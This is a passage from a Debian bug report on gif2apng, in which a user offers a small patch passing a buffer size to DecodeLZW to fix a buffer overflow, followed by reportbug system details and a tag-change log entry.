            DecodeLZW(buffer, buffer\_size, f1); // Added buffer\_size
\[...\]
               DecodeLZW(buffer, buffer\_size, f1); // Added Buffer size
\[...\]

This compiled successfully and fixed the buffer overflow for me. I am however not sure if this is the cleanest way to fix the issue and it could use some more testing.

Best regards
Kolja



-- System Information:
Debian Release: 10.11
  APT prefers oldstable-updates
  APT policy: (500, 'oldstable-updates'), (500, 'oldstable')
Architecture: amd64 (x86\_64)

Kernel: Linux 4.19.0-18-amd64 (SMP w/8 CPU cores)
Kernel taint flags: TAINT\_OOT\_MODULE, TAINT\_UNSIGNED\_MODULE
Locale: LANG=de\_DE.UTF-8, LC\_CTYPE=de\_DE.UTF-8 (charmap=UTF-8), LANGUAGE=de\_DE.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /usr/bin/dash
Init: systemd (via /run/systemd/system)
LSM: AppArmor: enabled

Versions of packages gif2apng depends on:
ii  libc6       2.28-10
ii  libzopfli1  1.0.2-1
ii  zlib1g      1:1.2.11.dfsg-1

gif2apng recommends no packages.

Versions of packages gif2apng suggests:
pn  apng2gif  <none>

-- no debconf information

**Added tag(s) upstream.** Request was from `Salvatore Bonaccorso <carnil@debian.org>` to `control@bugs.debian.org`. (Sun, 26 Dec 2021 23:03:08 GMT) (full text, mbox, link).

Send a report that this bug log contains spam.

Debian bug tracking system administrator <owner@bugs.debian.org\>. Last modified: Tue Dec 28 01:30:14 2021; Machine Name: buxtehude

Debian Bug tracking system

Debbugs is free software and licensed under the terms of the GNU Public License version 2. The current version can be obtained from https://bugs.debian.org/debbugs-source/.

Copyright © 1999 Darren O. Benham, 1997,2003 nCipher Corporation Ltd, 1994-97 Ian Jackson, 2005-2017 Don Armstrong, and many other contributors.

Tag

#debian